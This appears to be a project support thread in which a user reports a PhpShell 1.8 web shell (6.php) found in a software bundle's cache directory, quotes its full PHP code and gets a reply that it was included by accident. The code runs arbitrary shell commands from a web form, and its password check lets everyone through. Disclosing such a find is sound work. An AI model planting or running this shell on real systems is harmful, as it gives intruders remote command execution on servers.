I just Dled the latest file from our page and I noticed there is a file called 6.php in the cache directory. When I opened this file it contains phpshell. Is this a mistake how did phpshell get into this? Below is the code inside the file:
<?php
define('PHPSHELL_VERSION', '1.8');
/* Set your usernames and passwords like this:
$passwd = array('username' => 'password');
You can add several pairs of usernames and passwords to the array
to give several different people access to PhpShell.
/* First we check if there has been asked for a working directory. */
if ($work_dir != '') {
/* A workdir has been asked for */
if ($command != '') {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
$command = '';
}
}
}
if ($work_dir != '' && file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?></b></p>
<p>Choose new working directory:
<select name="work_dir" onchange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected=\"selected\">Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the
* parent directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
* parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter. This
* means that we have a top-level directory eg. /bin or /home
* etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
* directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
This is a mistake, and got in to the bundle by accident. It will be removed in the next version of the software. This should be released in a couple of days
If you would like to refer to this comment somewhere else in this project, copy and paste the following link:
I just Dled the latest file from our page and I noticed there is a file called 6.php in the cache directory. When I opened this file it contains phpshell. Is this a mistake how did phpshell get into this? Below is the code inside the file:
<?php
define('PHPSHELL_VERSION', '1.8');
/* Set your usernames and passwords like this:
$passwd = array('username' => 'password');
You can add several pairs of usernames and passwords to the array
to give several different people access to PhpShell.
$passwd = array('username_1' => 'password_1',
'username_2' => 'password_2',
// ...
'username_n' => 'password_n');
*/
$passwd = array('finder' => 'bender');
if (!isset($_SERVER['PHP_AUTH_USER']) ||
!isset($_SERVER['PHP_AUTH_PW']) ||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
header('WWW-Authenticate: Basic realm="PhpShell 1.8"');
header('HTTP/1.0 401 Unauthorized');
$authenticated = true;
} else {
$authenticated = true;
}
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<body>
<h1>PhpShell <?php echo PHPSHELL_VERSION ?></h1>
<?php if (!$authenticated) { ?>
<p>You failed to authenticate yourself to PhpShell. You can <a
href="phpshell.php">reload</a> to try again.</p>
<p>Try reading the <a href="INSTALL">INSTALL</a> file if you're having
problems with installing PhpShell.</p>
</body>
</html>
<?php exit; } //' <- fix syntax highlight... ?>
<?php
error_reporting (E_ALL);
$work_dir = empty($_REQUEST['work_dir']) ? '' : $_REQUEST['work_dir'];
$command = empty($_REQUEST['command']) ? '' : $_REQUEST['command'];
$stderr = empty($_REQUEST['stderr']) ? '' : $_REQUEST['stderr'];
/* First we check if there has been asked for a working directory. */
if ($work_dir != '') {
/* A workdir has been asked for */
if ($command != '') {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
$command = '';
}
}
}
if ($work_dir != '' && file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>
<form action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<fieldset><legend>Input</legend>
<p>Current working directory: <b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $_SERVER['PHP_SELF'] . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/',
$_SERVER['PHP_SELF'],
urlencode($path),
$work_dir_splitted[$i]);
}
}
?></b></p>
<p>Choose new working directory:
<select name="work_dir" onchange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected=\"selected\">Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the
* parent directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
* parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter. This
* means that we have a top-level directory eg. /bin or /home
* etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
* directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select></p>
<p>Command: <input type="text" name="command" size="60" /></p>
<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"
<?php if ($stderr) echo "checked=\"checked\""; ?> /> <input name="submit_btn" type="submit" value="Execute Command" /></p>
</fieldset>
<fieldset><legend>Output</legend>
<p><textarea cols="80" rows="20" readonly="readonly">
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; cat $tmpfile; rm $tmpfile";
} elseif ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
echo htmlspecialchars(shell_exec($command), ENT_COMPAT, 'UTF-8');
}
?>
</textarea></p>
</fieldset>
</form>
<script type="text/javascript">
document.forms[0].command.focus();
</script>
<hr />
<address>Copyright © 2000–2003, <a
href="mailto:gimpster@gimpster.com">Martin Geisler</a>. Get the latest
version at <a
href="http://www.gimpster.com/">www.gimpster.com/wiki/PhpShell</a>.</address>
<p>
<a href="http://validator.w3.org/check/referer">
<img src="valid-xhtml10" alt="Valid XHTML 1.0 Strict!"
height="31" width="88" />
</a>
<a href="http://jigsaw.w3.org/css-validator/check/referer">
width="88" height="31"
alt="Valid CSS!" />
</a>
</p>
</body>
</html>
This is a mistake, and got in to the bundle by accident. It will be removed in the next version of the software. This should be released in a couple of days